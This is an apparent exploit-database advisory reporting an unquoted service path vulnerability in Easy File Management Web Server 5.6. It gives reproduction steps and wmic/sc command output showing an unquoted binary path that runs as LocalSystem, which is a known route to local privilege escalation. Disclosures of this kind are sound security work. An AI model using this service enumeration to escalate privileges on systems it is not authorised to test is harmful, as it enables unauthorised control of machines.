Easy File Management Web Server version 5.6 suffers from an unquoted service path vulnerability.
226e09231a87f2a03e0ed11dd074cc7a
Exploit Title: Easy File Management Web Server v5.6 - 'Easy File Management Web Service' Unquoted Service Path
Exploit Author: boku
Date: 02/10/2020
Vendor Homepage: http://www.sharing-file.com/
Software Link: http://www.web-file-management.com/efmsetup.exe
Version: 5.6
Tested On: Windows 10 (32-bit)
# Recreate:
# 1) Download & install Easy File Management Web Server v5.6
# 2) Open EFM Web Server and click the 'Service...' Button on the bottom right
# 3) Click the 'Install Service' Button
C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Easy File Management Web Service C:\EFS Software\Easy File Management Web Server\fmwsService.exe Auto
C:\Users\nightelf>sc qc "Easy File Management Web Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Easy File Management Web Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\EFS Software\Easy File Management Web Server\fmwsService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Easy File Management Web Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem